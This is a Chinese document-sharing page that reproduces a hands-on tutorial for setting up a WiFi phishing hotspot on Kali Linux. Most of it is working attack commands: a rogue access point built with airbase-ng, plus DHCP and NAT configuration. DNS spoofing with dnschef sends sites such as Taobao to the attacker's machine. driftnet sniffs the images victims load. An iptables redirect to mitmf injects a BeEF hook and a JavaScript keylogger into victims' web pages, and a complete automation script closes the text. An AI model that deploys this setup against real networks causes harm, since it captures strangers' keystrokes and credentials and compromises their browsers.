利用Kali进行WiFi钓鱼测试实战学习Word文件下载.docx

上传人:b****2 文档编号:423125 上传时间:2023-04-28 格式:DOCX 页数:11 大小:742.93KB
下载 相关 举报
利用Kali进行WiFi钓鱼测试实战学习Word文件下载.docx_第1页
第1页 / 共11页
利用Kali进行WiFi钓鱼测试实战学习Word文件下载.docx_第2页
第2页 / 共11页
利用Kali进行WiFi钓鱼测试实战学习Word文件下载.docx_第3页
第3页 / 共11页
利用Kali进行WiFi钓鱼测试实战学习Word文件下载.docx_第4页
第4页 / 共11页
利用Kali进行WiFi钓鱼测试实战学习Word文件下载.docx_第5页
第5页 / 共11页
利用Kali进行WiFi钓鱼测试实战学习Word文件下载.docx_第6页
第6页 / 共11页
利用Kali进行WiFi钓鱼测试实战学习Word文件下载.docx_第7页
第7页 / 共11页
利用Kali进行WiFi钓鱼测试实战学习Word文件下载.docx_第8页
第8页 / 共11页
利用Kali进行WiFi钓鱼测试实战学习Word文件下载.docx_第9页
第9页 / 共11页
利用Kali进行WiFi钓鱼测试实战学习Word文件下载.docx_第10页
第10页 / 共11页
利用Kali进行WiFi钓鱼测试实战学习Word文件下载.docx_第11页
第11页 / 共11页
亲,该文档总共11页,全部预览完了,如果喜欢就下载吧!
下载资源
资源描述

利用Kali进行WiFi钓鱼测试实战学习Word文件下载.docx

《利用Kali进行WiFi钓鱼测试实战学习Word文件下载.docx》由会员分享,可在线阅读,更多相关《利用Kali进行WiFi钓鱼测试实战学习Word文件下载.docx(11页珍藏版)》请在冰点文库上搜索。

利用Kali进行WiFi钓鱼测试实战学习Word文件下载.docx

max-lease-time 

8000;

subnet 

10.0.0.0 

netmask 

255.255.255.0 

{

option 

routers 

10.0.0.1;

subnet-mask 

255.255.255.0;

domain-name-servers 

range 

10.0.0.10 

10.0.0.100;

}

这里以10.0.0.1作为网关和dns服务器地址。

然后我们处理无线网卡

ifconfig 

wlan1 

down 

 

#wlan1修改成你的网卡

iwconfig 

mode 

monitor

up

airmon-ng 

start 

wlan1

上述命令可以防止出现:

Error:

Gotchannel-1,expectedavalue>

0.

然后用airbase建立热点

airbase-ng 

-e 

Fishing 

-c 

11 

mon0

热点的网络流量会被虚拟到at0这块网卡上面

at0 

10.0.0.1 

255.255.255.0

route 

add 

-net 

gw 

10.0.0.1

打开ip转发

echo 

>

/proc/sys/net/ipv4/ip_forward

开启dhcp

dhcpd 

-cf 

/etc/dhcp/dhcpd.conf 

-pf 

/var/run/dhcpd.pid 

at0

service 

start

然后可以试着用手机连接,应该可以连上但上不了网

于是配置NAT

iptables 

-t 

nat 

-A 

POSTROUTING 

-o 

eth0 

-j 

MASQUERADE 

#对eth0进行源nat

FORWARD 

-i 

ACCEPT 

#把无线网卡流量转发到有线网卡(或者什么能上网的网卡)上面

-p 

tcp 

--syn 

-s 

10.0.0.0/24 

TCPMSS 

--set-mss 

1356 

#修改最大报文段长度

注意那第三个命令调整MSS,不加后果很严重(我就一直死在这里)

(这里可能还是DNS错误,请看后文中的dns代理服务器搭建)

劫持DNS

dnschef

过程:

dnschef 

--nameserver 

210.73.64.1#53

上述命令是以ip10.0.0.1(上文中的fakeap网关和DNS的ip)建立dns,对于所有请求转发到210.73.64.1进行解析。

显然这只是个“代理”并没有劫持的功效

于是我们进化:

--fakedomains=, 

--fakeip=10.0.0.1 

把淘宝和XX解析到本机了。

当然可以把更多规则写在文件里:

剩下的大家自由发挥吧。

p.s:

这个和后文中mitmf冲突,mitmf识别http协议中的目的主机,进行转发,不受这个dns伪造影响。

图片嗅探

这是一个很好玩的功能

driftnet

driftnet 

然后程序会打开一个小窗口显示所有传输的图片:

单击图片保存到/

当然可以开启 

Adjunctmode:

-a

直接保存图片并显示文件名。

劫持Web流量

这个更好玩

BEEF;

mitmf;

先把80端口的流量劫持走(这里10000是mitmf默认监听端口)

PREROUTING 

--destination-port 

80 

REDIRECT 

--to-port 

10000

然后打开mitmf

mitmf 

--replace 

--search-str 

aaaaa 

--replace-str 

bbbbb#把所有网页中的aaaaa替换成bbbbb

上图XX了aaaaa

好吧不要恶作剧了,上干货

--inject 

--js-url 

http:

//10.0.0.1:

3000/hook.js 

--jskeylogger

mitmf在这里注入了js键盘记录器

最后用BEEF测试用户浏览器吧!

/usr/share/beef-xss/beef

浏览器打开http:

//127.0.0.1:

3000/ui/panel,初始用户名和密码都是beef

BEEF过于高深我还没玩得很清楚请大家自行探索。

对了,不要忘了抓包

最后是我写的脚本

#清空iptables

-F

-X 

-P 

OUTPUT 

mangle 

-F 

INPUT 

raw 

#建立热点

stop 

&

sleep 

gnome-terminal 

-x 

bash 

"

mon0"

#按需求修改

2

mtu 

1400

#配置dhcp

/etc/init.d/isc-dhcp-server 

#nat

MASQUERADE

ACCEPT

1356

#劫持80

#劫持dns

210.73.64.1#53"

#打开beef并进行80js键盘记录

--jskeylogger"

beef-xss

展开阅读全文
相关资源
猜你喜欢
相关搜索
资源标签

当前位置:首页 > 法律文书 > 调解书

copyright@ 2008-2023 冰点文库 网站版权所有

经营许可证编号:鄂ICP备19020893号-2